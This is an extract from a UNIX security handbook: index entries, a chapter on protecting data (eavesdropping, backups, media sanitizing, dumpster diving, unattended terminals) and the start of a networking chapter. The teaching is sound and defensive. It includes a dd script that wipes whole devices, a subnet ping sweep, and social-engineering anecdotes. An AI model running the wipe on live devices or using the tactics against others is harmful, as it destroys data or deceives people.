VERB command (sendmail) : 17.3.4.3. Improving the security of Berkeley sendmail V8<br />

verifying<br />

backups : 12.3.2.1. Verify your backups<br />

new passwords : 3.5. Verifying Your New Password<br />

signatures with PGP : 6.6.3.5. Decrypting messages and verifying signatures<br />

Verisign Inc. : 18.6. Dependence on Third Parties<br />

Version 2 UUCP<br />

15.2. Versions of UUCP<br />

15.4. <strong>Sec</strong>urity in Version 2 UUCP<br />

15.4.3. L.cmds: Providing Remote Command Execution<br />

callback feature : 15.4.1.5. Requiring callback<br />

Veteran's Health Administration : F.3.4.45. U.S. Veteran's Health Administration<br />

vi editor<br />

5.5.3.2. Another SUID example: IFS and the /usr/lib/preserve hole<br />

11.5.2.4. .exrc<br />

11.5.2.7. Other initializations<br />

vibration : 12.2.1.10. Vibration<br />

video tape : 7.1.4. Guarding Against Media Failure<br />

vipw command : 8.4.1. Changing an Account's Password<br />

virtual terminals : (see Telnet utility)<br />

Virtual Private Network : 21.1.2. Uses of Firewalls<br />

viruses<br />

11.1. Programmed Threats: Definitions<br />

11.1.5. Viruses<br />

27.2.2. Viruses on the Distribution Disk<br />

bacteria programs : 11.1.7. Bacteria and Rabbits<br />

references on : D.1.4. Computer Viruses and Programmed Threats<br />

voltage spikes : 12.2.1.8. Electrical noise<br />

VPN : 21.1.2. Uses of Firewalls<br />

VRFY option (sendmail) : 17.3.4.3. Improving the security of Berkeley sendmail V8<br />

vsprintf function : 23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

VT100 terminal : 27.2.1. Hardware Bugs<br />

Index: W<br />

w command<br />

10.1.2. utmp and wtmp Files<br />

17.3.1. systat (TCP Port 11)<br />

24.2.1. Catching One in the Act<br />

-Wall option (in C) : 23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

WANs (Wide Area Networks) : 16.1. Networking<br />

war : 12.2.5. Defending Against Acts of War and Terrorism<br />

warrants<br />

26.2.4. Hazards of Criminal Prosecution<br />

26.2.5. If You or One of Your Employees Is a Target of an Investigation...<br />

water : 12.2.1.12. Water<br />

humidity : 12.2.1.11. Humidity<br />

sprinkler systems : 12.2.1.1. Fire<br />

stopping fires with : 12.2.1.1. Fire<br />

web browsers<br />

18.5. Risks of Web Browsers<br />

18.5.2. Trusting Your Software Vendor<br />

Netscape Navigator : 18.4.1. Eavesdropping Over the Wire<br />

Web documents : (see HTML documents)<br />

Web servers<br />

access to files on<br />

18.3. Controlling Access to Files on Your Server<br />

18.3.3. Setting Up Web Users and Passwords<br />

log files : 18.4.2. Eavesdropping Through Log Files<br />

on Macintosh : 18.2. Running a <strong>Sec</strong>ure Server<br />

web servers<br />

18.2. Running a <strong>Sec</strong>ure Server<br />

18.2.5. Other Issues<br />

authentication users : 18.3.3. Setting Up Web Users and Passwords<br />

.htaccess file bug : 18.3.1. The access.conf and .htaccess Files<br />

multiple suppliers of : 18.6. Dependence on Third Parties<br />

as superuser : 18.2.1. The Server's UID<br />

symbolic-link following : 18.2.2.2. Additional configuration issues<br />

Wiener, Michael : 6.4.4.3. DES strength<br />

Westinghouse : F.3.4.46. Westinghouse Electric Corporation<br />

wheel group<br />

4.1.3.1. The /etc/group file<br />

4.3.6. Restricting su<br />

8.5.2. The wheel Group<br />

who command<br />

8.1.3. Accounts That Run a Single Command<br />

10.1.2. utmp and wtmp Files<br />

17.3.1. systat (TCP Port 11)<br />

24.2.1. Catching One in the Act<br />

24.2.4. Tracing a Connection<br />

whodo command<br />

10.1.2. utmp and wtmp Files<br />

24.2.1. Catching One in the Act<br />

whois command : 24.2.4.2. How to contact the system administrator of a computer you don't know<br />

Wide Area Networks (WANs) : 16.1. Networking<br />

window, time : (see time)<br />

windows (glass) : 12.2.3.3. Glass walls<br />

windows servers : (see NSWS; X Window System)<br />

wireless transmission : (see radio, transmissions)<br />

wiretaps : (see eavesdropping)<br />

wiz command : 17.3.4.2. Using sendmail to receive email<br />

wizard's password (sendmail) : 17.3.4.1. sendmail and security<br />

WN server : 18.3. Controlling Access to Files on Your Server<br />

workstations, backing up : 7.2.1. Individual Workstation<br />

World Wide Web (WWW)<br />

18. WWW <strong>Sec</strong>urity<br />

18.7. Summary<br />

browsers : (see web browsers)<br />

checklist for : A.1.1.17. Chapter 18: WWW <strong>Sec</strong>urity<br />

documents on : (see HTML documents)<br />

eavesdropping on<br />

18.4. Avoiding the Risks of Eavesdropping<br />

18.4.2. Eavesdropping Through Log Files<br />

encrypting information on : 18.4.1. Eavesdropping Over the Wire<br />

HTTP : (see HTTP)<br />

logging downloaded files : 10.3.5. access_log Log File<br />

posting breakins on : 24.6. Resuming Operation<br />

references on : E.3. WWW Pages<br />

security mailing list : E.1.3.10. WWW-security<br />

servers : (see Web servers)<br />

trademarks and copyrights<br />

26.4.2. Copyright Infringement<br />

26.4.3. Trademark Violations<br />

viruses through : 11.1.5. Viruses<br />

world-writable files/directories : 11.6.1.1. World-writable user files and directories<br />

Worm program : 1. Introduction<br />

worms<br />

11.1. Programmed Threats: Definitions<br />

11.1.6. Worms<br />

wrappers, checklist for : A.1.1.21. Chapter 22: Wrappers and Proxies<br />

write command<br />

5.5.3.1. write: Example of a possible SUID/SGID security hole<br />

23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

in Swatch program : 10.6.2. The Swatch Configuration File<br />

time-outs on : 23.3. Tips on Writing Network Programs<br />

write permission<br />

5.1.7. File Permissions in Detail<br />

5.4. Using Directory Permissions<br />

write-protecting backups : 7.1.6.2. Write-protect your backups<br />

write-protecting filesystems : 9.1.2. Read-only Filesystems<br />

WRITE= command : 15.5.2. Permissions Commands<br />

writing<br />

passwords (on paper) : 3.6.5. Writing Down Passwords<br />

programmed threats : 11.3. Authors<br />

wtmp file<br />

10.1.2. utmp and wtmp Files<br />

10.1.3.1. Pruning the wtmp file<br />

wtmpx file : 10.1.2. utmp and wtmp Files<br />

wuftpd server : 17.3.2.4. Setting up an FTP server<br />

www user/group : 18.2.2. Understand Your Server's Directory Structure<br />

Index: X<br />

X Window System<br />

12.3.4.4. X terminals<br />

17.3.21. The X Window System (TCP Ports 6000-6063)<br />

17.3.21.5. Denial of service attacks under X<br />

denial of service under : 17.3.21.5. Denial of service attacks under X<br />

screen savers : 12.3.5.2. X screen savers<br />

X-rated material : 26.4.5. Pornography and Indecent Material<br />

X.500 directory service : 16.4.4. OSI<br />

X/Open Consortium : 1.3. History of <strong>UNIX</strong><br />

xargs command<br />

5.2.5.1. AIX Access Control Lists<br />

11.5.1.4. Filename attacks<br />

Xauthority facility, magic cookies : 17.3.21.4. Using Xauthority magic cookies<br />

xdm system : 17.3.21.4. Using Xauthority magic cookies<br />

XDR (external data representation) : 19.2. Sun's Remote Procedure Call (RPC)<br />

Xerox Network Systems (XNS) : 16.4.5. XNS<br />

xferlog file : 10.3.3. xferlog Log File<br />

xfrnets directive : 17.3.6.1. DNS zone transfers<br />

xhost command : 17.3.21.3. The xhost facility<br />

XOR (exclusive OR) : 6.4.7. An Unbreakable Encryption Algorithm<br />

XScreensaver program : 12.3.5.2. X screen savers<br />

XTACACS : (see TACACS)<br />

Index: Y<br />

Yellow Pages, NIS : 16.2.6.2. Other naming services<br />

ypbind daemon<br />

19.3.2.3. Making sure <strong>Sec</strong>ure RPC programs are running on every workstation<br />

19.4.4.5. Spoofing NIS<br />

ypcat publickey command : 19.3.2.3. Making sure <strong>Sec</strong>ure RPC programs are running on every workstation<br />

yppasswd command<br />

3.4. Changing Your Password<br />

8.2. Monitoring File Format<br />

ypserv daemon : 19.4.4.5. Spoofing NIS<br />

ypset command : 19.4.5. Unintended Disclosure of Site Information with NIS<br />

Index: Z<br />

Zheng, Yuliang : 6.5.4.3. HAVAL<br />

Zimmermann, Phil : 6.6.3. PGP: Pretty Good Privacy<br />

zone transfers<br />

17.3.6. Domain Name System (DNS) (TCP and UDP Port 53)<br />

17.3.6.1. DNS zone transfers<br />



Chapter 12: Physical Security

12.3 Protecting Data

Obviously, as described above, there is a strong overlap between physical security and data privacy and integrity. Indeed, the goal of some attacks is not the physical destruction of your computer system but the penetration and removal (or copying) of the sensitive information it contains. This section explores several different types of attacks on data and discusses approaches for protecting against these attacks.

12.3.1 Eavesdropping

Electronic eavesdropping is perhaps the most sinister type of data piracy. Even with modest equipment, an eavesdropper can make a complete transcript of a victim's actions - every keystroke, and every piece of information viewed on a screen or sent to a printer. The victim, meanwhile, usually knows nothing of the attacker's presence, and blithely goes about his or her work, revealing not only sensitive information, but the passwords and procedures necessary for obtaining even more.

In many cases, you cannot possibly know if you're being monitored. Sometimes you will learn of an eavesdropper's presence when the attacker attempts to make use of the information obtained: often, by then, you cannot prevent significant damage. With care and vigilance, however, you can significantly decrease the risk of being monitored.

12.3.1.1 Wiretapping

By their very nature, electrical wires are prime candidates for eavesdropping (hence the name wiretapping). An attacker can follow an entire conversation over a pair of wires with a simple splice - sometimes he doesn't even have to touch the wires physically: a simple induction loop coiled around a terminal wire is enough to pick up most voice and RS-232 communications.

Here are some guidelines for preventing wiretapping:

●   Routinely inspect all wires that carry data (especially terminal wires and telephone lines used for modems) for physical damage.

●   Protect your wires from monitoring by using shielded cable. Armored cable provides additional protection.

●   If you are very security conscious, place your cables in steel conduit. In high-security applications, the conduit can be pressurized with gas; gas pressure monitors can be used to trip an alarm system in the event of tampering. However, these approaches are notoriously expensive to install and maintain.

12.3.1.2 Eavesdropping by Ethernet and 10Base-T

Because Ethernet and other local area networks are susceptible to eavesdropping, unused offices should not have live Ethernet or twisted-pair ports inside them.

You may wish to scan periodically all of the Internet numbers that have been allocated to your subnet to make sure that no unauthorized Internet hosts are operating on your network. You can also run LAN monitoring software and have alarms sound each time a packet is detected with a previously unknown Ethernet address.
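A minimal Bourne shell sketch of such a scan follows. It assumes a single class C subnet, BSD/Linux-style ping -c and arp -an options, and a locally maintained file of known Ethernet (hardware) addresses; the subnet prefix 192.168.1 and the file /usr/local/etc/known-ethers are placeholders for whatever your site actually uses, not standard names.

    #!/bin/sh
    # Sketch: report hosts on the local subnet whose Ethernet addresses
    # are not in a list of known addresses.  Assumes "ping -c" and
    # "arp -an" in the BSD/Linux style; adjust for your own system.

    NET=192.168.1                      # example subnet prefix
    KNOWN=/usr/local/etc/known-ethers  # example file: one known address per line

    # Ping every address once so that live hosts show up in the ARP cache.
    i=1
    while [ $i -le 254 ]
    do
        ping -c 1 $NET.$i > /dev/null 2>&1 &
        i=`expr $i + 1`
    done
    wait

    # Flag any cached Ethernet address that is not in the known list.
    arp -an | tr -d '()' | tr 'A-F' 'a-f' | awk '{print $2, $4}' |
    while read ip ether
    do
        case "$ether" in
        *:*:*:*:*:*)
            grep "^$ether\$" $KNOWN > /dev/null 2>&1 ||
                echo "unknown Ethernet address $ether at $ip"
            ;;
        esac
    done

A dedicated LAN monitor or packet sniffer can perform the same comparison continuously; the point of the sketch is only that the bookkeeping is easy to automate.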

Some 10Base-T hubs can be set to monitor the IP numbers of incoming packets. If a packet comes in from a computer connected to the hub that doesn't match what the hub has been told is correct, it can raise an alarm or shut down the link. This capability helps prevent various forms of Ethernet spoofing.

Increasingly, large organizations are turning to switched 10Base-T hubs. These hubs do not rebroadcast all traffic to all ports, as if they were on a shared Ethernet; instead, they determine the hardware address of each machine on each line, and only send a computer the packets that it should receive. Switching 10Base-T hubs are sold as a tool for increasing the capacity of 10Base-T networks, but they also improve the security of these networks by minimizing the potential for eavesdropping.

12.3.1.3 Eavesdropping by radio and using TEMPEST

Every piece of electrical equipment emits radiation in the form of radio waves. Using specialized equipment, one could analyze the emitted radiation generated by computer equipment and determine the calculations that caused the radiation to be emitted in the first place.

Radio eavesdropping is a special kind of tapping that security agencies (in the U.S., these agencies include the FBI, CIA, and NSA) are particularly concerned about. In the 1980s, a certification system called TEMPEST was developed in the U.S. to rate the susceptibility of computer equipment to such monitoring. Computers that are TEMPEST-certified are generally substantially less susceptible to radio monitoring than computers that are not, but they are usually more expensive and larger because of the extra shielding.

As an alternative to certifying individual computers, we can now TEMPEST-certify rooms or entire buildings. Several office buildings constructed in Maryland and northern Virginia are encased in a conductive skin that dampens radio emissions coming from within.

Although TEMPEST is not a concern for most computer users, the possibility of electronic eavesdropping by radio should not be discounted. Performing such eavesdropping is much easier than it would seem at first. For example, the original Heathkit H19 terminal transmitted a radio signal so strong that it could be picked up simply by placing an ordinary television set on the same table as the H19 terminal. All of the characters from the terminal's screen were plainly visible on the television set's screen. In another case, information from an H19 on one floor of a house could be read on a television placed on another floor.

12.3.1.4 Auxiliary ports on terminals

Many terminals are equipped with a printer port for use with an auxiliary printer. These printer ports can be used for eavesdropping if an attacker manages to connect a cable to them. If you do not have an auxiliary printer, we recommend that you make sure no other cables are connected to your terminal's printer port.

12.3.1.5 Fiber optic cable

A good type of physical protection is to use fiber optic media for a network. It is more difficult to tap into a fiber optic cable than it is to connect into an insulated coaxial cable (although an optical "vampire" tap exists that can tap a fiber optic network simply by clamping down on the cable). Successful taps often require cutting the fiber optic cable first, thus giving a clear indication that something is amiss. Fiber optic cabling is also less susceptible to signal interference and grounding problems. However, fiber is sometimes easier to break or damage, and more difficult to repair, than is standard coaxial cable.

12.3.2 Protecting Backups

Backups should be a prerequisite of any computer operation - secure or otherwise - but the information stored on backup tapes is extremely vulnerable. When the information is stored on a computer, the operating system's mechanisms of checks and protections prevent unauthorized people from viewing the data (and can possibly log failed attempts). After information is written onto a backup tape, anybody who has physical possession of the tape can read its contents.

For this reason, protect your backups at least as well as you normally protect your computers themselves.

Here are some guidelines for protecting your backups:

●   Don't leave backups hanging unattended in a computer room that is generally accessible. Somebody could take a backup and then have access to all of the files on your system.

●   Don't entrust backups to a messenger who is not bonded.

●   Sanitize backup tapes before you sell them, use them as scratch tapes, or otherwise dispose of them. (See Section 12.3.2.3, "Sanitize your media before disposal" later in this chapter.)

12.3.2.1 Verify your backups

You should periodically verify your backups to make sure they contain valid data. (See Chapter 7, Backups, for details.)

Verify backups that are months or years old in addition to backups that were made yesterday or the week before. Sometimes, backups in archives are slowly erased by environmental conditions. Magnetic tape is also susceptible to a process called print through, in which the magnetic domains on one piece of tape wound on a spool affect the next layer.

The only way to find out if this process is harming your backups is to test them periodically. You can also minimize print through by spinning your tapes to the end and then rewinding them, because the tape will not line back up in the same way when the tape is rewound. We recommend that at least once a year, you check a sample of your backup tapes to make sure that they contain valid data.
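How you perform such a check depends entirely on your backup program and media. The following Bourne shell sketch shows one hedged approach: a checksum recorded when each tape was written (here kept in an example file, /usr/local/adm/backup.sums, of "label checksum" lines) is recomputed by reading the tape end to end. The device and file names are illustrative only.

    #!/bin/sh
    # Sketch: verify that a backup tape can still be read end to end by
    # recomputing a checksum recorded when the tape was written.

    TAPE=/dev/rmt/0                     # example tape device
    SUMFILE=/usr/local/adm/backup.sums  # example file of "label checksum" lines

    label=$1
    if [ -z "$label" ]; then
        echo "usage: $0 tape-label" >&2
        exit 1
    fi

    # Read the whole tape; a partially erased or unreadable tape will
    # produce a checksum different from the one recorded at backup time.
    newsum=`dd if=$TAPE bs=20b 2>/dev/null | sum | awk '{print $1}'`
    oldsum=`grep "^$label " $SUMFILE | awk '{print $2}'`

    if [ -n "$oldsum" ] && [ "$newsum" = "$oldsum" ]; then
        echo "$label: verified"
    else
        echo "$label: FAILED verification (got $newsum, expected ${oldsum:-nothing})" >&2
        exit 1
    fi

Restoring a few files from the tape and comparing them against the originals (with cmp or diff) is an even stronger check, at the cost of more tape time.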

12.3.2.2 Protect your backups

Many of the hazards to computers mentioned in the first part of this chapter are equally hazardous to backups. To maximize the chances of your data surviving in the event of an accident or malicious incident, keep your computer system and your backups in different locations.

12.3.2.3 Sanitize your media before disposal

If you throw out your tapes, or any other piece of recording media, be sure that the data on the tapes has been completely erased. This process is called sanitizing.

Simply deleting a file that is on your hard disk doesn't delete the data associated with the file. Parts of the original data - and sometimes entire files - can usually be easily recovered. When you are disposing of old media, be sure to destroy the data itself, in addition to the directory entries.

Modern hard disks pose a unique problem for media sanitizing because of the large amount of hidden and reserved storage. A typical 1-gigabyte hard disk may have as much as 400 megabytes of additional storage; some of this storage is used for media testing and bad-block remapping, but much of it is unused during normal operations. With special software, you can access this reserved storage area; you could even install "hard disk viruses" that can reprogram a hard disk controller, take over the computer's peripheral bus and transfer data between two devices, or feed faulty data to the host computer. For these reasons, hard disks must be sanitized with special software that is specially written for each particular disk drive's model number and revision level.

If you are less security conscious, you can use a bulk eraser - a hand-held electromagnet that has a hefty field. Experiment with reading back the information stored on tapes that you have "bulk erased" until you know how much erasing is necessary to eliminate your data. But be careful: as the area of recording becomes smaller and smaller, modern hard disks are becoming remarkably resistant to external magnetic fields. Within a few years, even large, military degaussers will have no effect against high-density disk drive systems.

NOTE: Do not locate your bulk eraser near your disks or good tapes! Also beware of placing the eraser in another room, on the other side of a wall from your disks or tapes. People who have pacemakers should be warned not to approach the eraser.

As a last resort, you can physically destroy your backup tapes and disks before you throw them out. Unfortunately, physical destruction is getting harder and harder to do. While incinerators do a remarkably good job destroying tapes, stringent environmental regulations have forced many organizations to abandon this practice. Organizations have likewise had to give up acid baths. Until recently, crushing was preferred for hard disk drives and disk packs. But as disk densities get higher and higher, disk drives must be crushed into smaller and smaller pieces to frustrate laboratory analysis of the resulting material. As a result, physical destruction is losing in popularity when compared with software-based techniques for declassifying or sanitizing computer media.

If you are a system administrator, you have an additional responsibility to sanitize your backup tapes before you dispose of them. Although you may not think that any sensitive or confidential information is stored on the tapes, your users may have been storing such information without your knowledge.

One common sanitizing method involves overwriting the entire tape. If you are dealing with highly confidential or security-related materials, you may wish to overwrite the disk or tape several times, because data can be recovered from tapes that have been overwritten only once. Commonly, tapes are overwritten three times - once with blocks of 0s, then with blocks of 1s, and then with random numbers. Finally, the tape may be degaussed - or run through a bandsaw several times to reduce it to thousands of tiny pieces of plastic. We recommend that you thoroughly sanitize all media before disposal.
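On systems that let you write to the raw tape or disk device, the three passes described above can be approximated with dd, as in the sketch below. The device name is only an example, /dev/zero and /dev/urandom are not present on every older UNIX system, and there is no substitute for reading the media back to confirm that the overwrite actually took.

    #!/bin/sh
    # Sketch: overwrite a tape or raw disk device three times before
    # disposal -- zeros, then ones, then pseudo-random data.
    # WARNING: pointed at the wrong device, this destroys live data.

    DEV=$1                              # e.g., /dev/rmt/0 -- an example only
    if [ -z "$DEV" ]; then
        echo "usage: $0 raw-device" >&2
        exit 1
    fi

    # Pass 1: blocks of zero bits.
    dd if=/dev/zero of=$DEV bs=64k 2>/dev/null

    # Pass 2: blocks of one bits, made by inverting the zeros.
    dd if=/dev/zero bs=64k 2>/dev/null | tr '\0' '\377' | dd of=$DEV bs=64k 2>/dev/null

    # Pass 3: pseudo-random data, where a random device is available.
    if [ -c /dev/urandom ]; then
        dd if=/dev/urandom of=$DEV bs=64k 2>/dev/null
    fi

Remember the caveat about modern hard disks earlier in this section: reserved and remapped areas may not be reachable this way, which is why disk-specific sanitizing software or physical destruction may still be necessary.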

12.3.2.4 Backup encryption<br />

Backup security can be substantially enhanced by encrypting the data stored on the backup tapes. Many<br />

Macintosh and PC backup packages provide for encrypting a backup set; some of these programs even<br />

use decent encryption algorithms. (Do not trust a backup system's encryption if the program's<br />

manufacturer refuses to disclose the algorithm.) Several tape drive manufacturers sell hardware that<br />

contains chips that automatically encrypt all data as it is written. We discuss the issue of encrypting your<br />

backups in more detail in Chapter 7.<br />

NOTE: If you encrypt the backup of a filesystem and you forget the encryption key, the<br />

information stored on the backup will be unusable. This is why escrowing your own keys is<br />

important. (See the sidebar "A Note About Key Escrow".)<br />

12.3.3 Other Media<br />

In the last section, we discussed the importance of erasing magnetic media before disposing of it.<br />

However, that media is not the only material that should be carefully "sanitized" before disposal. Other<br />

material that may find its way into the trash may contain information that is useful to crackers or<br />

competitors. This includes printouts of software (including incomplete versions), memos, design<br />

documents, preliminary code, planning documents, internal newsletters, company phonebooks, manuals,<br />

and other material.<br />

That some program printouts might be used against you is obvious, especially if enough are collected<br />

over time to derive a complete picture of your software development. If the code is commented well<br />

enough, it may also give away clues as to the identity of beta testers and customers, testing strategies,<br />

and marketing plans!<br />

Other material may be used to derive information about company personnel and operations. With a<br />

company phone book, one could masquerade as an employee over the telephone and obtain sensitive<br />

information including dial-up numbers, account names, and passwords. Sound farfetched? Think again -<br />

there are numerous stories of such social engineering. The more internal information an outsider has, the<br />

more easily he can obtain sensitive information. By knowing the names, office numbers, and extensions<br />

of company officials and their staff, he can easily convince an overworked and undertrained operator that<br />

he needs to violate the written policy - or incur the wrath of the "vice president" - on the phone.<br />

Other information that may find its way into your dumpster includes information on the types and<br />

versions of your operating systems and computers, serial numbers, patch levels, and other information. It<br />

may include hostnames, IP numbers, account names, and other information critical to an attacker. We<br />

have heard of some firms disposing of listings of their complete firewall configuration and filter rules - a<br />

gold mine for someone seeking to infiltrate the computers.<br />


How will this information find its way into the wrong hands? Well, "dumpster diving" or "trashing" is<br />

one such way. After hours, someone intent on breaking your security could be rummaging through your<br />

dumpster, looking for useful information. In one case we heard recounted, a "diver" dressed up as a street<br />

person (letting his beard grow a bit and not bathing for a few days), splashed a little cheap booze on<br />

himself, half-filled a mesh bag with empty soda cans, and went to work. As he went from dumpster to<br />

dumpster in an industrial office park, he was effectively invisible: busy and well-paid executives seem to<br />

see through the homeless and unfortunate. If someone began to approach him, he would pluck invisible<br />

bugs from his shirt and talk loudly to himself. In the one case where he was accosted by a security guard,<br />

he was able to convince the guard to let him continue looking for "cans" for spare change. He even<br />

panhandled the guard to give him $5 for a meal!<br />

Perhaps you have your dumpster inside a guarded fence. But what happens after it is picked up by the<br />

trash hauler? Is it dumped where someone can go through the information off your premises?<br />

Consider carefully the value of the information you throw away. Consider investing in shredders for each<br />

location where information of value might be thrown away. Educate your users not to dispose of<br />

sensitive material in their refuse at home, but to bring it in to be shredded. If your organization is large<br />

enough and local ordinances allow, you may also wish to incinerate some sensitive paper waste on-site.<br />

12.3.4 Protecting Local Storage<br />

In addition to computers and mass-storage systems, many other pieces of electrical data-processing<br />

equipment store information. For example, terminals, modems and laser printers often contain pieces of<br />

memory that may be downloaded and uploaded with appropriate control sequences.<br />

Naturally, any piece of memory that is used to hold sensitive information presents a security problem,<br />

especially if that piece of memory is not protected with a password, encryption, or other similar<br />

mechanism. However, the local storage in many devices presents an additional security problem, because<br />

sensitive information is frequently copied into such local storage without the knowledge of the computer<br />

user.<br />

12.3.4.1 Printer buffers<br />

Computers can transmit information many times faster than most printers can print it. For this reason,<br />

printers are sometimes equipped with "printer spoolers" - boxes with semiconductor memory that receive<br />

information quickly from the computer and transmit it to the printer at a slower rate.<br />

Many printer spoolers have the ability to make multiple copies of a document. Sometimes, this function<br />

is accomplished with a COPY button on the front of the printer spooler. Whenever the COPY button is<br />

pressed, a copy of everything that has been printed is sent to the printer for a second time. The security<br />

risk is obvious: if sensitive information is still in the printer's buffer, an attacker can use the COPY<br />

button to make a copy for himself.<br />

Today, many high-speed laser printers are programmable and contain significant amounts of local<br />

storage. (Some laser printers have internal hard disks that can be used to store hundreds of megabytes of<br />

information.) Some of these printers can be programmed to store a copy of any document printed for<br />

later use. Other printers use the local storage as a buffer; unless the buffer is appropriately sanitized after<br />


printing, an attacker with sufficient skill can retrieve some or all of the contained data.<br />

12.3.4.2 Printer output<br />

One form of local storage you may not think of is the output of your workgroup printer. If the printer is<br />

located in a semi-public location, the output may be vulnerable to theft or copying before it is claimed.<br />

You should ensure that printers, plotters, and other output devices are located in a secured location. Fax<br />

machines face similar vulnerabilities.<br />

12.3.4.3 Multiple screens<br />

Today many "smart" terminals are equipped with multiple screens of memory. By pressing a PAGE-UP<br />

key (or a key that is similarly labeled), you can view information that has scrolled off the terminal's top<br />

line.<br />

When a user logs out, the memory used to hold information that is scrolled off the screen is not<br />

necessarily cleared - even if the main screen is. Therefore, we recommend that you be sure, when you log<br />

out of a computer, that all of your terminal's screen memory is erased. You might have to send a control<br />

sequence or even turn off the terminal to erase its memory.<br />

12.3.4.4 X terminals<br />

Many X terminals have substantial amounts of local storage. Some X terminals even have hard disks that<br />

can be accessed from over the network.<br />

Here are some guidelines for using X terminals securely:<br />

● If your users work with sensitive information, they should turn off their X terminals at the end of<br />
the day to clear the terminals' RAM memory.<br />

● If your X terminals have hard disks, you should be sure that the terminals are password protected<br />
so that they cannot be easily reprogrammed over the network. Do not allow service personnel to<br />
remove the X terminals for repair unless the disks are first removed and erased.<br />

12.3.4.5 Function keys<br />

Many smart terminals are equipped with function keys that can be programmed to send an arbitrary<br />

sequence of keystrokes to the computer whenever a function key is pressed. If a function key is used to<br />

store a password, then any person who has physical access to the terminal can impersonate the terminal's<br />

primary user. If a terminal is stolen, then the passwords are compromised. Therefore, we recommend that<br />

you never use function keys to store passwords or other kinds of sensitive information (such as<br />

cryptographic keys).<br />

12.3.5 Unattended Terminals<br />

Unattended terminals where users have left themselves logged in present a special attraction for vandals<br />

(as well as for computer crackers). A vandal can access the person's files with impunity. Alternatively,<br />

the vandal can use the person's account as a starting point for launching an attack against the computer<br />


system or the entire network: any tracing of the attack will usually point fingers back toward the<br />

account's owner, not to the vandal.<br />

In particular, not only will this scenario allow someone to create a SUID shell of the user involved, and<br />

thus gain longer-term access to the account, but an untrained attacker could commit some email mayhem.<br />

Imagine someone sending email, as you, to the CEO or the Dean, making some lunatic and obscene<br />

suggestions? Or perhaps email to whitehouse.gov with a threat against the President?[7] Hence, you<br />

should never leave terminals unattended for more than short periods of time.<br />

[7] Don't even think about doing this yourself! The <strong>Sec</strong>ret Service investigates each and<br />

every threat against the President, the President's family, and certain other officials. They<br />

take such threats very seriously, and they are not known for their senses of humor. They are<br />

also very skilled at tracing down the real culprit in such incidents - we know from observing<br />

their work on a number of occasions. These threats simply aren't funny - especially if you<br />

end up facing Federal criminal charges as a result.<br />

Some versions of <strong>UNIX</strong> have the ability to log a user off automatically - or at least to blank his screen<br />

and lock his keyboard - when the user's terminal has been idle for more than a few minutes.<br />

12.3.5.1 Built-in shell autologout<br />

If you use the C shell, you can use the autologout shell variable to log you out automatically after you<br />

have been idle for a specified number of minutes.[8] Normally, this variable is set in your ~/.cshrc file.<br />

[8] The autologout variable is not available under all versions of the C shell.<br />

For example, if you wish to be logged out automatically after you have been idle for 10 minutes, place<br />

this line in your ~/.cshrc file:<br />

set autologout=10<br />

Note that the C shell will log you out only if you idle at the C shell's command prompt. If you are idle<br />

within an application, such as a word processor, you will remain logged in.<br />

The ksh has a TMOUT variable that performs a similar function. TMOUT is specified in seconds:<br />

TMOUT=600<br />
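For example, a site-wide setting might be placed in /etc/profile so that ksh users cannot simply forget it; marking the variable readonly keeps it from being unset later in a user's own startup files. This is a minimal sketch - exact behavior varies among shell versions, so test it on yours:<br />

# /etc/profile fragment for ksh users: log out after 10 idle minutes.
TMOUT=600
export TMOUT
readonly TMOUT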

12.3.5.2 X screen savers<br />

If you use the X Window System, you may wish to use a screen saver that automatically locks your<br />

workstation after the keyboard and mouse have been inactive for more than a predetermined number of<br />

minutes.<br />

There are many screen savers to chose from. XScreensaver was originally written by the Student<br />

Information Processing Board at MIT. New versions are periodically posted to the Usenet newsgroup<br />

comp.sources.x and are archived on the computer ftp.uu.net. Another screen saver is xautolock. In<br />

addition, HP VUE and the COSE Desktop come with an automatic screen locker. AIX includes a utility<br />

called xss that automatically locks X screens.<br />
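For example, with xautolock and xlock - assuming the option names used by your versions match those shown here - a line such as the following in a user's X startup file locks the display after ten idle minutes:<br />

# In ~/.xsession or ~/.xinitrc: lock the screen after 10 minutes of no
# keyboard or mouse activity.
xautolock -time 10 -locker "xlock -mode blank" &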

NOTE: Many vendor-supplied screen savers respond to built-in passwords in addition to<br />


the user's passwords. The <strong>UNIX</strong> lock program, for example, previously unlocked the user's<br />

terminal if somebody typed hasta la vista - and this fact was undocumented in the manual.<br />

Unless you have the source code for a program, there is no way to determine whether it has<br />

a back door of any kind, although you can find simple-minded ones by scanning the<br />

program with the strings command. You would be better off using a vendor-supplied<br />

locking tool rather than leaving your terminal unattended, and unlocked, while you go for<br />

coffee. But be attentive, and beware.<br />

12.3.6 Key Switches<br />

Some kinds of computers have key switches on their front panels that can be used to prevent the system<br />

from being rebooted in single-user mode. Some computers also have ROM monitors that prevent the<br />

system from being rebooted in single-user mode without a password.<br />

Key switches and ROM monitor passwords provide additional security and should be used when<br />

possible. However, you should also remember that any computer can be unplugged. The most important<br />

way to protect a computer is to restrict physical access to that computer.<br />


Chapter 16<br />

16. TCP/IP Networks<br />

Contents:<br />

Networking<br />

IPv4: The <strong>Internet</strong> Protocol Version 4<br />

IP <strong>Sec</strong>urity<br />

Other Network Protocols<br />

Summary<br />

Local and wide area computer networks have changed the landscape of computing forever. Almost gone<br />

are the days when each computer was separate and distinct. Today, networks allow people across a room<br />

or across the globe to exchange electronic messages, share resources such as printers and disk drives, or<br />

even use each other's computers. Networks have become such an indispensable part of so many people's<br />

lives that one can hardly imagine using modern computers without them.<br />

But networks have also brought with them their share of security problems, precisely because of their<br />

power to let users easily share information and resources. Networks allow people you have never met to<br />

reach out and touch you - and erase all of your files in the process. They have enabled individuals to<br />

launch sophisticated electronic attacks against major institutions as well as desktop computers in home<br />

offices. Indeed, networks have created almost as many risks as they have created opportunities.<br />

The next six chapters of this book discuss <strong>UNIX</strong> security issues arising from the deployment of computer<br />

networks. In this chapter we describe local and wide area networks, and show how they fit into the <strong>UNIX</strong><br />

security picture.<br />

16.1 Networking<br />

From a practical viewpoint, computer users today usually divide the world of networking into two<br />

halves:<br />

● Local Area Networks (LANS) are high-speed networks used to connect together computers at a<br />
single location. Popular LANS include Ethernet (see Figure 16.1), token ring, and 10Base-T (also<br />
known as twisted-pair; see Figure 16.2). LANS typically run at 10 megabits/sec or faster. LANS<br />
capable of 100 megabits/sec are expected to be widely available in the coming years.<br />

